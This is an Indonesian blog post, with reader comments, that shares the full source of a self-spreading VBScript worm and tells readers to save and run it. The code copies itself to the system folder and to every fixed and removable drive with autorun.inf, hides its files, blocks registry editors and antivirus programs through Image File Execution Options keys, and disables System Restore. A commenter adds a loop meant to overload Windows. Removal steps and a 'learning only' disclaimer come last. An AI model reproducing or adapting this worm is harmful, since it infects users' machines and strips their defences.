Sobat Muda

NOTE: To use the advanced features of this site you need javascript turned on.

Home arrow PC arrow Script Virus *vbs (1)

Pengumuman

  • Diperbolehkan bagi temen-temen untuk mengutip seluruh isi artikel di dalam situs ini untuk tujuan kebaikan dan WAJIB untuk mencantumkan NAMA PENULIS dan SUMBERNYA.
  • Bagi yang mengisi comment ataupun guestbook, diharuskan mencantumkan nama dan identitas. Jika tidak maka comment kamu akan saya delete tanpa konfirmasi.
  • Bagi yang mengisi comment ataupun guestbook, cukup mengisi sekali saja. Karena setiap comment harus dimoderasi, jadi nggak ditampilkan terlebih dahulu.
  • Buat teman-teman yang ingin buat blog sendiri, kami juga menawarkan Hosting Gratis. So, buat yang pengen apply, silahkan pelajari lebih lanjut dengan membuka menu : Hosting Gratis pada menu di atas/

Mutiara 'Ilmu

Dari Asad, dia berkata: "Jika Syadad bin Aus akan merebahkan tubuhnya diatas pembaringan, maka tingkahnya seperti sebutir biji yang diletakkan diatas wajan penggorengan. Dia berkata: 'Ya Allah, seseungguhnya bayangan neraka membuatku susah tidur.' Akhirnya ia kembali bangkit dari tempat tidur untuk kemudian mengerjakan shalat sunnah." (Shifatush Shafwah I/709)
 
Script Virus *vbs (1) PDF Print E-mail
User Rating: / 9
PoorBest 
Written by Andita SB   
Wednesday, 09 April 2008

 

Ya..

Kali ini saya akan membagi script virus, script ini boleh anda sebarluaskan, bahkan anda jalankan. Tapi dengan tujuan untuk pembelajaran semata.

Kedewasan sikap anda sangat dibutuhkan, segala resiko yang dihasilkan oleh virus ini, diluar tanggung jawab saya.

Sekali lagi, gunakan script ini hanya untuk tujuan pembelajaran. Bukan untuk merusak, bila anda ingin melihat kemampuannya, silahkan aktifkan di komputer anda sendiri. Jangan di komputer orang lain. Saya tidak bertanggung jawab atas kerusakan yang di buat oleh virus ini.

Pertama-tama buka notepad, kemudian copas (copy-paste) script di bawah ini kedalam notepad, kemudian simpan dengan format vhck3d.vbs dimulai dari on error resume next

-------------------------script begin--------------------------

On error resume next

Dim dini,jatiya,i,loph,you,mf,isi,tf,vhck3d,nt,check,sd

 

'Siapkan isi autorun atau bahasa kerennya make the autorun

Isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe vhck3d.vbs"

Set you = createobject("scripting.filesystemobject")

Set mf = you.getfile(wscript.scriptfullname)

Dim text,size

Size = mf.size

Check = mf.drive.drivetype

Set text = mf.openastextstream(1,-2)

Do while not text.atendofstream

Dini = dini & text.readline

Dini = dini & vbcrlf

Loop

Do

 

'Buat file induk bahasa coolnya prepare the mother

Set i = you.getspecialfolder(0)

Set jatiya = you.getspecialfolder(1)

Set tf = you.getfile(jatiya & "\hck3d.vbs")

Tf.attributes = 32

Set tf = you.createtextfile(jatiya & "\hck3d.vbs",2,true)

Tf.write dini

Tf.close

Set tf = you.getfile(jatiya & "\hck3d.vbs")

Tf.attributes = 39

 

'Sebar ke removable disc ditambahkan dengan autorun.inf ini saya mah gak tau bahasa inggrisnya

For each loph in you.drives

 

If (loph.drivetype = 1 or loph.drivetype = 2) and loph.path <> "a:" then

 

Set tf=you.getfile(loph.path &"\vhck3d.sys.vbs")

Tf.attributes =32

Set tf=you.createtextfile(loph.path &"\vhck3d.vbs",2,true)

Tf.write dini

Tf.close

Set tf=you.getfile(loph.path &"\vhck3d.vbs")

Tf.attributes = 39

 

Set tf =you.getfile(loph.path &"\autorun.inf")

Tf.attributes = 32

Set tf=you.createtextfile(loph.path &"\autorun.inf",2,true)

Tf.write isi

Tf.close

Set tf = you.getfile(loph.path &"\autorun.inf")

Tf.attributes=39

End if

Next

 

'Manipulasi registry

Set vhck3d = createobject("wscript.shell")

 

'Banyak yang dirubah..liat ndiri deh aaah

 

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\msconfig.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedit.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedt32.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\registryeditor.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\setup.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avscan.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avcenter.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ashavast.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ansav.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremoval.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremover.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\pcmav-cln.exe.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows\currentversion\winlogon\legalnoticecaption", "my loph dini"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\limitsystemrestorecheckpointing", "1", "reg_dword"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\disablemsi", "1", "reg_dword"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disablesr", "1", "reg_dword"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disableconfig", "1", "reg_dword"

 

If check <> 1 then

Wscript.sleep 200000

End if

Loop while check <> 1

Set sd = createobject("wscript.shell")

Sd.run i & "\explorer.exe /e,/select, " & wscript.scriptfullname

-----------------------end script----------------------------- 

 

Yaaa....itu adalah scriptnya, tapi kalau kalian mau modifikasi juga boleh..bahkan cukup sampai di

Sd.run i & "\explorer.exe /e,/select, " & wscript.scriptfullname

Juga boleh, yg bawahnya gak usah kalian lanjutin bisa..

Cara bunuhnya gampang.

Ikutin aja langkah2 dibawah ini untuk pembasmiannya.kalo virusnya aktif, (kalo belum, diaktifkan laaah) jangan buka my computer seperti biasa.tapi buka melalui explorer, bisa lewat start -> klik kanan di my computer, bisa lewat jendela + e(logo windows yang ada di keyboard). Lalu masuk di setiap drive melalui tree, ini agar virusnya tidak jalan di banyak drive, cuman cukup jalan di satu drive dimana kalian simpan dan mengaktifakn virus tersebut. Soalnya, kalo virusnya sudah aktif, lalu kalian klik 2x tiap2 drive kalian maka virus itu aktif di banyak drive soalnya di setiap drive ada file autorunnya.

Cara pembasmiannya :

1. Pake plugins ansav yang registry fx, ansav bisa kalian dapatkan disini http://ansav.com/. Setelah itu pilih check all, lalu restart explorer

2. Panggil task manager, bisa melalui ctrl+shift bersamaan lalu tekan esc di processes bunuh semua wscript.exe yang ada

3. Hapus semua file vhck3d.vbs serta autorun.inf di setiap drive

4. Hapus file induknya di c:\windows\system32 yang bernama hck3d.vbs

5. Panggil run, bisa melalui jendela + r (logo windows di keboard)masukkan parameternya PCMAV untuk mengembalikan settingan registry yang dirubah.

 

(thanks to Galang, junior hacker and vixer ^_^. Yang telah mengembangkan virus ini dengan cukup baik...)

 

Comments
Add New Search
anggie  - mhs     |221.132.224.xxx |2008-05-16 10:30:48
lumayan....!!!
Afiz  - bagus juga neeh     |125.164.64.xxx |2008-07-28 19:56:48

wah makasih banyak ya atas infonya. semoga bermanfaat bagi semua dan tidak
disalah gunakan untuk kejahatan
satrio   |114.120.91.xxx |2008-08-04 11:06:39
mas atau mbak tolong beritahu scriptnya virus wayang karena aq kena virus
itu
Andita SB     |114.120.91.xxx |2008-08-04 11:10:47
wah, maaf..., untuk request script virus saya tidak bisa memenuhi. Untuk
melakukan pembersihan terhadap virus, tolong sertakan juga samplenya supaya bisa
dibuatkan removalnya.

atau saya anjurkan buat main ke forum Ansav supaya saya
dan temen-temen lain bisa carikan jalan keluar.
ghopay  - anti virus   |125.161.129.xxx |2008-08-06 11:45:58
Mas Bantu Aku,,,,,
Pc ku desktopnya diubah oleh virus(imagenya malaikat)dah gitu
tuh background desktop ngatain user tolol(sepertinya Virus Lokal)kira2 tuh virus
apa yee, ku scan pake PCMAV tidak kena,,,,,
Makasih
Mawardi  - Balasan buat ghopay   |125.160.50.xxx |2009-01-29 10:36:24
Coba cari di www.virusindonesia.com!
aLun   |222.124.179.xxx |2008-10-07 14:28:09
aq minta tolong...
update terbarunya PCMAV karena aq tidak tau cara
menupdatenya. please yach, bantu dong....
Reiha   |125.164.236.xxx |2008-11-05 13:29:02
Aduh mas...!!! Penting....
Tolong dong!!! Computer q kena virus yang namanya
"Heur"....!!!
File-file ku banyak yang di hapus ama tuh virus. Semua
file bertype .exe gak isa dipake lagi. Waktu aku scan pake AVG 8, malah AVG nya
yang di serang ama tuh viruz!! Mohon petunjuknya ya.....
rido   |125.167.122.xxx |2008-11-18 10:23:59
tolong dong komp gw kena virus virusafe.vbs gmn cara hapus tu virus?
pcmav 1.8
gak bsa hapus tu virus..


" admin :
pake Ansav ma plugin maltrack atau
smadav buat hapus manual. Trus tinggal benerin registrynya."
Teguh Wibowo  - Tanya Scipt Virus Bungas.vbs   |125.167.122.xxx |2008-11-18 10:22:57
Mas punya scriptnya virus bungas.vbs ga????? ,

kalau ada tolong kirimkan ya,
dan juga script virus yang lain yang mas punya





Thanks
gifa  - tanya   |125.164.254.xxx |2008-12-23 18:40:23
bos punya gak scriptnya sality yang baru?
satria     |125.164.251.xxx |2008-12-24 23:55:25
assalamualaikum .......
menarik sekali artikelnya mas..
apakah mas bisa
membagi ilmu mas?
yg dasar tntng scrip virus!
maklum
sbgai pemula...
makasih ya mas
wassalamualaikum......
syandu  - as   |125.164.225.xxx |2008-12-30 17:18:50
ok, windowsku dah kna virus klo iclean bsa g ma simatech
irul  - comment 2 you   |118.137.32.xxx |2009-01-19 19:43:44
Assalamuallaikum
bagus-bagus tuh artikelnya...
apalagi buat dipelajarin,
saran
saya klo bisa sih banyakin artikel buat ngebasminya aja.
Thank's ya mas.
elmoen  - dancing with virus   |125.167.150.xxx |2009-02-06 21:39:48
kalo anti virusnya di rename, debugger nya kedetect gak, saya kira kelemahannya
disitu, nah solusinya gimana dong ????/
you_jei  - Iseng   |125.160.250.xxx |2009-02-08 17:29:27
Ajibb....


Viruzz nya...

hehehe
erpan  - tolongggggggggggg     |125.162.5.xxx |2009-02-11 02:17:49
assalamualaikum
mas ada yang lebih jago lagi gak virus nya
tolong mas ya di
kirim ke mail aku erpan.afandi@yahoo.com
tolong ya mas
kalo bisa mas
virus nya gak bisa di detek antivirus AVIRA,ANSAV,AVAST
terimakasih ya mas

tolong ya mas dikirimin
Andita SB     |125.167.122.xxx |2009-02-12 14:22:32
@ Erpan :

wa'alaykumussalaam wa rahmatullaah..
wah buat apa nih..? kalo
buat ngerusak maaf nggak bisa.
saya punya beberapa source code modifan..
tono  - -     |118.137.12.xxx |2009-02-27 17:59:38
hari gini masih maenan virus kapan mau majunya negara kita klo orangnya seperti
ini maunya membuat hal hal yang ga perlu
putra   |125.167.187.xxx |2009-03-04 14:54:08
mas,.....
ada G script virus yg lain, tlg dikirim ke emile Q donk,
cm buat study
aj ko',

thank's be fore,....
pratama  - Info   |118.98.169.xxx |2009-04-11 22:34:22
makasih banyak y.... gw dah tau sekarang tentang itu
Harmeet Singh  - student   |202.149.64.xxx |2009-04-14 11:34:06
this a good program for student for study to open the virus script.
Zombiee  - Loe tambahkan aj prulangan biar Mampus...   |125.167.114.xxx |2009-04-16 04:23:56
Loe tambahkan aj perulangan yg Shell ke C:\windows\explorer.exe sbxk 100
kli. biar windows dan perangkatnya mampus.........................

For i = 0 to
100
shell("C:\windows\explorer.exe",v bHide
Next i

mampus
tuhc windows dan prangkatnya skkalian.
Riku  - Just a Little Comment     |125.161.234.xxx |2009-04-29 18:07:13
Artikel Menarik, script model ini Mang dah bnyk variannya...
Bisa d bilang tiap
org bisa bikin varian barunya. Namun buat saya virus kaya *vbs atau *exe lebih
rawan ketimbang *bat yang jarang kesamber AntiVirus.

Mas kok berani sih make
Joomla?
kan open source lho.
Smua hacker di dunia tahu code-nya...
Admin  - re: Just a Little Comment     |125.167.122.xxx |2009-05-04 06:56:04
Riku wrote:

Mas kok berani sih make Joomla?
kan open source lho.
Smua hacker di
dunia tahu code-nya...


Yups, Joomla memang open source, di satu sisi memang banyak yang tau
source codenya, tapi kelebihan laen dari open source adalah
dukungan komunitas besar yang terpublikasi. Jadi setiap bugs akan
cepet diketahui.

Tapi, lepas dari itu, tidak ada keamanan 100%. Silahkan
menghubungi saya jika ada yang nemuin bugs paad situs ini. Itung-itung
diaudit secara gratis
fajj  - pingin     |202.70.55.xxx |2009-05-07 00:00:19
Siiip.
Dari dulu aku pingin bisa pemrograman mas.... tp sampai skrg ga bisa2. ga
ada yg bimbing sih.
auk ahh gelap.
Adith si_dudud  - Study...study,,,,,   |125.165.169.xxx |2009-05-10 21:25:12


Assalamuallaikum..
AhlanWasahlan..

wow,,,

than ks kk,,,,

buat studied
mantabs bener ini...

ai lebih tertarik buat basmi virusnya kk..

punya sedikit
bahan buat study nya gag..

kirimin ke email ya....

semoga menjadi ilmu yang
berguna....
zaenal   |125.163.208.xxx |2009-06-17 15:45:50
can you give me the explanation to make virus
sarpan  - pingin belajar   |203.130.207.xxx |2009-06-29 14:28:57
tol dunk aj kita buat virus.
tolong y
klu blh krm ke email q y thanks
denniu  - Pengen Tahu   |116.12.41.xxx |2009-07-13 13:11:30
Gmn sih caranya script diatas bisa infeksi flashdisk dengan
autorunnya?misal:
Set tf=you.getfile(loph.path
&"\vhck3d.sys.vbs"... dan
Set tf=you.createtextfile(loph.path
&"\autorun.inf",2,true)...path nya harus ditulis ap donk?please send
to my email..
Oka   |125.164.127.xxx |2009-07-20 12:35:59


Kerrrreeeeeeeen
ZOKO LAKA LAKA LAKA LAKA ? YEA  - script virus   |125.161.139.xxx |2009-07-27 16:26:06
dulu komputer gua pernah kena virus yg ngak merusak sistem tapi lumayan bikin
kaget karena dia bisa mengambil alih sistem untuk sementara apapun program yg
gua buka/jalankan.

alkisah... sejak dapet DVD dari sebuah kampus setiap pukul
12 malem kalo komputer lg nyala muncul pesan : "sistem anda kami ambil
alih..." dan gua ngak bisa ngejalanin fungsi apapun. terus tampilan di layar
terbelah dua seperti gerbang terbuka dan muncul credit. terus balik lagi seperti
semula tanpa kerusakan. cara ngapusnya ya diinstall ulang tuh komputer.

gua
yakin di dlm DVD dimasukin script virus and autorun-nya terus tuh dimasukin ke
dalm folder adn dikasih contreng read only and hidden pada properties. dasar
mahasiswa iseng!
Vyan  - WOW   |202.129.187.xxx |2009-08-19 10:46:22
Scriptna keren loh,,
tapi ada yang lebih parah gak virusnnya?

Terima kasih .
. . .
gdfsf   |110.138.239.xxx |2009-11-09 16:24:31
Mas, bisa bantu aq ga??? rencana kan aq mau back up video pendidikan org q. Tp
biar ga mudah di di bajak aq membutuhkan pelampiran virus. . ada scrip virus
virus yg ngrusak sistem ga???

o za,, virus diatas tu efeknya paan??
blz di
email q. thanks
wika  - saran   |202.152.240.xxx |2009-11-15 12:24:39
saran
website dah lumayan bagus
cumanmungkin, diberikan tautan untuk artikel
terkait..
tanpa harus tampilin sedikit isinya
biar ga keliatan terlalu rame
Write comment
Name:
Email:
 
Website:
Title:
UBBCode:
[b] [i] [u] [url] [quote] [code] [img] 
 
 
:angry::0:confused::cheer:B):evil::silly::dry::lol::kiss::D:pinch:
:(:shock::X:side::):P:unsure::woohoo::huh::whistle:;):s
:!::?::idea::arrow:
 

3.26 Copyright (C) 2008 Compojoom.com / Copyright (C) 2007 Alain Georgette / Copyright (C) 2006 Frantisek Hliva. All rights reserved."

Last Updated ( Friday, 18 July 2008 )
 
< Prev   Next >